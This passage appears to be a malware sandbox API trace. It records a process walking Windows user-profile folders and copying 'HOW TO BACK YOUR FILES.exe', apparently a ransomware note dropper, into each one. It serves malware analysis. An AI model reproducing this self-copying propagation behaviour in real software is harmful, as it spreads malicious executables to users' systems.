ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.773] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.773] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.773] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0078.773] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0078.773] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.773] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\microsoft\\windows media\\12.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.774] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.774] GetLastError () returned 0x0 [0078.774] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.774] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559cae60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559cae60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.774] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.774] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.775] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0078.775] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0078.775] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.775] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\microsoft\\windows mail\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.775] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.775] GetLastError () returned 0x0 [0078.776] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.776] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x574201c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x574201c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.776] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.776] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.776] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery" [0078.776] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery" [0078.776] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.776] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\microsoft\\windows mail\\stationery\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.777] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.777] GetLastError () returned 0x0 [0078.777] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.777] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x578246e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x578246e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.777] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.777] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.777] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup" [0078.778] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup" [0078.778] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.778] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\microsoft\\windows mail\\backup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.778] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.778] GetLastError () returned 0x0 [0078.779] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.779] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a89a8c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a89a8c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.779] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.779] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.779] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" [0078.779] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" [0078.779] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.779] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\microsoft\\windows mail\\backup\\new\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.780] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.780] GetLastError () returned 0x0 [0078.780] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.780] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5840b4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5840b4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.780] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.780] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.780] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" [0078.780] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" [0078.780] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.780] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\microsoft\\media player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.781] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.781] GetLastError () returned 0x0 [0078.781] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.781] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aa17680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.782] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.782] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.782] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0078.782] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0078.782] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.782] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.782] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.783] GetLastError () returned 0x0 [0078.783] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.783] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.783] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.783] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.783] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0078.783] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0078.783] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.783] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.784] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.784] GetLastError () returned 0x0 [0078.784] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.784] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.784] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.784] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.785] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0078.785] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0078.785] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.785] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.785] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.785] GetLastError () returned 0x0 [0078.786] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.786] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58646980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58646980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.786] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.786] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.786] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0078.786] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0078.786] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.786] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\microsoft\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.787] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.787] GetLastError () returned 0x0 [0078.787] lstrcatW (in: lpString1="", lpString2="\\*" | 